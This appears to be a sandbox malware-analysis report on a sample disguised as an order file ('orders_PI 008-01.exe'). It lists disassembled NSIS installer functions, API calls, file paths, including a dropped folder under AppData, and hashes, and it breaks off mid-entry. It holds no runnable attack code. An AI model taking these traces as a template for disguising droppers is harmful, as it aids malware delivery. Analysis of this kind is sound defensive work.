                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\orders_PI 008-01.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                        • API String ID: 1975747703-39584036
                                        • Opcode ID: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                        • Instruction ID: 7ce8ec14a48fa11d69b3a5e1f0875b7083b8d607cd9ed6182ea3b60f82ca9994
                                        • Opcode Fuzzy Hash: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                        • Instruction Fuzzy Hash: 286193702407007ED320AB669D46F2B3A7CEB85B49F40853FF941B22E2DB7D99018B6D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 318 403015-403063 GetTickCount GetModuleFileNameW call 405ee4 321 403065-40306a 318->321 322 40306f-40309d call 4063ee call 405d0f call 4063ee GetFileSize 318->322 323 403245-403249 321->323 330 4030a3 322->330 331 403188-403196 call 402fb1 322->331 333 4030a8-4030bf 330->333 337 403198-40319b 331->337 338 4031eb-4031f0 331->338 335 4030c1 333->335 336 4030c3-4030cc call 403444 333->336 335->336 344 4031f2-4031fa call 402fb1 336->344 345 4030d2-4030d9 336->345 340 40319d-4031b5 call 40345a call 403444 337->340 341 4031bf-4031e9 GlobalAlloc call 40345a call 40324c 337->341 338->323 340->338 364 4031b7-4031bd 340->364 341->338 369 4031fc-40320d 341->369 344->338 349 403155-403159 345->349 350 4030db-4030ef call 405e9f 345->350 354 403163-403169 349->354 355 40315b-403162 call 402fb1 349->355 350->354 367 4030f1-4030f8 350->367 360 403178-403180 354->360 361 40316b-403175 call 4068d0 354->361 355->354 360->333 368 403186 360->368 361->360 364->338 364->341 367->354 373 4030fa-403101 367->373 368->331 370 403215-40321a 369->370 371 40320f 369->371 374 40321b-403221 370->374 371->370 373->354 375 403103-40310a 373->375 374->374 377 403223-40323e SetFilePointer call 405e9f 374->377 375->354 376 40310c-403113 375->376 376->354 378 403115-403135 376->378 381 403243 377->381 378->338 380 40313b-40313f 378->380 382 403141-403145 380->382 383 403147-40314f 380->383 381->323 382->368 382->383 383->354 384 403151-403153 383->384 384->354
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00403026
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\orders_PI 008-01.exe,00000400,?,?,?,?), ref: 00403042
                                          • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\orders_PI 008-01.exe,80000000,?,?,?,?,?), ref: 00405EE8
                                          • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,?,?), ref: 00405F0A
                                        • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\orders_PI 008-01.exe,C:\Users\user\Desktop\orders_PI 008-01.exe,80000000,?,?,?,?,?), ref: 0040308E
                                        • GlobalAlloc.KERNELBASE(?,?,?,?,?,?), ref: 004031C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\orders_PI 008-01.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\orders_PI 008-01.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                        • API String ID: 2803837635-1034390895
                                        • Opcode ID: 08ca265c2c11c7ade98783a519f9a0a5c073a42a03571b96a4881a179354b053
                                        • Instruction ID: b65d07b499067b34cf8ea267e223a71d0fae98adc47698ec1498b1efb03bef53
                                        • Opcode Fuzzy Hash: 08ca265c2c11c7ade98783a519f9a0a5c073a42a03571b96a4881a179354b053
                                        • Instruction Fuzzy Hash: DD51D171900204ABDB119F64DD85B9E7EACEB45316F20843BE911BA2D1DB7C8F418B5D

                                         Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                        control_flow_graph 449 40642b-406436 450 406438-406447 449->450 451 406449-40645f 449->451 450->451 452 406465-406472 451->452 453 406677-40667d 451->453 452->453 456 406478-40647f 452->456 454 406683-40668e 453->454 455 406484-406491 453->455 457 406690-406694 call 4063ee 454->457 458 406699-40669a 454->458 455->454 459 406497-4064a3 455->459 456->453 457->458 461 406664 459->461 462 4064a9-4064e7 459->462 465 406672-406675 461->465 466 406666-406670 461->466 463 406607-40660b 462->463 464 4064ed-4064f8 462->464 469 40660d-406613 463->469 470 40663e-406642 463->470 467 406511 464->467 468 4064fa-4064ff 464->468 465->453 466->453 474 406518-40651f 467->474 468->467 471 406501-406504 468->471 472 406623-40662f call 4063ee 469->472 473 406615-406621 call 406335 469->473 475 406651-406662 lstrlenW 470->475 476 406644-40664c call 40642b 470->476 471->467 477 406506-406509 471->477 487 406634-40663a 472->487 473->487 479 406521-406523 474->479 480 406524-406526 474->480 475->453 476->475 477->467 483 40650b-40650f 477->483 479->480 485 406561-406564 480->485 486 406528-406546 call 4062bc 480->486 483->474 488 406574-406577 485->488 489 406566-406572 GetSystemDirectoryW 485->489 495 40654b-40654f 486->495 487->475 491 40663c 487->491 493 4065e2-4065e4 488->493 494 406579-406587 GetWindowsDirectoryW 488->494 492 4065e6-4065ea 489->492 496 4065ff-406605 call 40669d 491->496 492->496 501 4065ec 492->501 493->492 498 406589-406593 493->498 494->493 499 406555-40655c call 40642b 495->499 500 4065ef-4065f2 495->500 496->475 503 406595-406598 498->503 504 4065ad-4065c3 SHGetSpecialFolderLocation 498->504 499->492 500->496 506 4065f4-4065fa lstrcatW 500->506 501->500 503->504 507 40659a-4065a1 503->507 508 4065c5-4065dc SHGetPathFromIDListW CoTaskMemFree 504->508 509 4065de 504->509 506->496 511 4065a9-4065ab 507->511 508->492 508->509 509->493 511->492 511->504
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040656C
                                        • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 0040657F
                                        • SHGetSpecialFolderLocation.SHELL32(0040548D,0079A700,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 004065BB
                                        • SHGetPathFromIDListW.SHELL32(0079A700,Call), ref: 004065C9
                                        • CoTaskMemFree.OLE32(0079A700), ref: 004065D4
                                        • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065FA
                                        • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 00406652
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                        • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 717251189-1230650788
                                        • Opcode ID: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                        • Instruction ID: 6a9894c1754425a34e634a53c322024ca71031740d406166b65bc8419ebad360
                                        • Opcode Fuzzy Hash: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                        • Instruction Fuzzy Hash: A261F471600505ABDF249F24DD40ABE37A5AF51318F22813FE543BA2D4DB3D8AA1CB5E

                                         Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                        control_flow_graph 512 405456-40546b 513 405471-405482 512->513 514 405522-405526 512->514 515 405484-405488 call 40642b 513->515 516 40548d-405499 lstrlenW 513->516 515->516 518 4054b6-4054ba 516->518 519 40549b-4054ab lstrlenW 516->519 520 4054c9-4054cd 518->520 521 4054bc-4054c3 SetWindowTextW 518->521 519->514 522 4054ad-4054b1 lstrcatW 519->522 523 405513-405515 520->523 524 4054cf-405511 SendMessageW * 3 520->524 521->520 522->518 523->514 525 405517-40551a 523->525 524->523 525->514
                                        APIs
                                        • lstrlenW.KERNEL32(007A0F28,00000000,0079A700,755723A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                        • lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,755723A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                        • lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,755723A0), ref: 004054B1
                                        • SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2531174081-0
                                        • Opcode ID: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                        • Instruction ID: 198c43ce2186877ab3aec1728abe16fb3d15ea5683a6b9ae92d40c5f72e5eea1
                                        • Opcode Fuzzy Hash: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                        • Instruction Fuzzy Hash: EC21AF75900518BACB119F65DD44ACFBFB9EF89354F10802AF904B22A1C3798A81CFA8

                                         Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                        control_flow_graph 526 405925-405970 CreateDirectoryW 527 405972-405974 526->527 528 405976-405983 GetLastError 526->528 530 40599d-40599f 527->530 529 405985-405999 SetFileSecurityW 528->529 528->530 529->527 531 40599b GetLastError 529->531 531->530
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
                                        • GetLastError.KERNEL32 ref: 0040597C
                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405991
                                        • GetLastError.KERNEL32 ref: 0040599B
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040594B
                                        • C:\Users\user\Desktop, xrefs: 00405925
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                        • API String ID: 3449924974-1326413622
                                        • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                        • Instruction ID: 4c6d3c4ce34384c56ae6b54862a6db5cebbf8231f9905efb0a53c4272bf1951e
                                        • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                        • Instruction Fuzzy Hash: E1011AB1C00219EADF009FA5DD44BEFBBB8EF04314F00803AD544B6190E7789648CFA9

                                         Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                        control_flow_graph 532 406773-406793 GetSystemDirectoryW 533 406795 532->533 534 406797-406799 532->534 533->534 535 4067aa-4067ac 534->535 536 40679b-4067a4 534->536 538 4067ad-4067e0 wsprintfW LoadLibraryExW 535->538 536->535 537 4067a6-4067a8 536->537 537->538
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                        • wsprintfW.USER32 ref: 004067C5
                                        • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%S.dll$UXTHEME$\
                                        • API String ID: 2200240437-1946221925
                                        • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                        • Instruction ID: 038d7fed81a94acb9f8d17f6b302bf2205b26bc145b48260013954e6d266918a
                                        • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                        • Instruction Fuzzy Hash: 65F0F670510119A7CF14AB64DD0DF9B376CAB40309F10047AA646F20D0EB7C9A68CBA8

                                         Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                        control_flow_graph 602 405f13-405f1f 603 405f20-405f54 GetTickCount GetTempFileNameW 602->603 604 405f63-405f65 603->604 605 405f56-405f58 603->605 607 405f5d-405f60 604->607 605->603 606 405f5a 605->606 606->607
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405F31
                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\orders_PI 008-01.exe",004034A0,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC), ref: 00405F4C
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F18
                                        • nsa, xrefs: 00405F20
                                        • "C:\Users\user\Desktop\orders_PI 008-01.exe", xrefs: 00405F13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: "C:\Users\user\Desktop\orders_PI 008-01.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-817891363
                                        • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                        • Instruction ID: 2ec416300cd5d099b763d3688cd3c506487cb406e2025687db32897a35dea38d
                                        • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                        • Instruction Fuzzy Hash: 84F09676B00204BBDB008F55ED05E9FB7ACEB95750F10803AEA04F7140E6B499548B58

                                         Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                        control_flow_graph 608 6ff41777-6ff417b6 call 6ff41b5f 612 6ff418d6-6ff418d8 608->612 613 6ff417bc-6ff417c0 608->613 614 6ff417c2-6ff417c8 call 6ff4239e 613->614 615 6ff417c9-6ff417d6 call 6ff423e0 613->615 614->615 620 6ff41806-6ff4180d 615->620 621 6ff417d8-6ff417dd 615->621 622 6ff4182d-6ff41831 620->622 623 6ff4180f-6ff4182b call 6ff425b5 call 6ff415b4 call 6ff41272 GlobalFree 620->623 624 6ff417df-6ff417e0 621->624 625 6ff417f8-6ff417fb 621->625 629 6ff41833-6ff4187c call 6ff415c6 call 6ff425b5 622->629 630 6ff4187e-6ff41884 call 6ff425b5 622->630 646 6ff41885-6ff41889 623->646 627 6ff417e2-6ff417e3 624->627 628 6ff417e8-6ff417e9 call 6ff42af8 624->628 625->620 631 6ff417fd-6ff417fe call 6ff42d83 625->631 635 6ff417e5-6ff417e6 627->635 636 6ff417f0-6ff417f6 call 6ff42770 627->636 642 6ff417ee 628->642 629->646 630->646 639 6ff41803 631->639 635->620 635->628 645 6ff41805 636->645 639->645 642->639 645->620 651 6ff418c6-6ff418cd 646->651 652 6ff4188b-6ff41899 call 6ff42578 646->652 651->612 654 6ff418cf-6ff418d0 GlobalFree 651->654 658 6ff418b1-6ff418b8 652->658 659 6ff4189b-6ff4189e 652->659 654->612 658->651 661 6ff418ba-6ff418c5 call 6ff4153d 658->661 659->658 660 6ff418a0-6ff418a8 659->660 660->658 662 6ff418aa-6ff418ab FreeLibrary 660->662 661->651 662->658
                                        APIs
                                          • Part of subcall function 6FF41B5F: GlobalFree.KERNEL32(?), ref: 6FF41DD4
                                          • Part of subcall function 6FF41B5F: GlobalFree.KERNEL32(?), ref: 6FF41DD9
                                          • Part of subcall function 6FF41B5F: GlobalFree.KERNEL32(?), ref: 6FF41DDE
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF41825
                                        • FreeLibrary.KERNEL32(?), ref: 6FF418AB
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF418D0
                                          • Part of subcall function 6FF4239E: GlobalAlloc.KERNEL32(?,?), ref: 6FF423CF
                                          • Part of subcall function 6FF42770: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,6FF417F6,00000000), ref: 6FF42840
                                          • Part of subcall function 6FF415C6: wsprintfW.USER32 ref: 6FF415F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                         • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                        • String ID:
                                        • API String ID: 3962662361-3916222277
                                        • Opcode ID: 3a947f3756ace00ce0007f1c81de9565843bbd0aa4b2c24e24a93780ace049b0
                                        • Instruction ID: bc47a2fb7062d31cac1f250132148f8e060b6445734eb0557aa3f620a042c6ed
                                        • Opcode Fuzzy Hash: 3a947f3756ace00ce0007f1c81de9565843bbd0aa4b2c24e24a93780ace049b0
                                        • Instruction Fuzzy Hash: C741E6714003059ADF12AF78D884BD63FA8BF05324F044176ED25EE2D7DB78A1A8C764

                                         Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                        control_flow_graph 665 405dcb-405de6 call 4063ee call 405d6e 670 405de8-405dea 665->670 671 405dec-405df9 call 40669d 665->671 672 405e44-405e46 670->672 675 405e09-405e0d 671->675 676 405dfb-405e01 671->676 678 405e23-405e2c lstrlenW 675->678 676->670 677 405e03-405e07 676->677 677->670 677->675 679 405e2e-405e42 call 405cc3 GetFileAttributesW 678->679 680 405e0f-405e16 call 40674c 678->680 679->672 685 405e18-405e1b 680->685 686 405e1d-405e1e call 405d0f 680->686 685->670 685->686 686->678
                                        APIs
                                          • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,?,?,?), ref: 004063FB
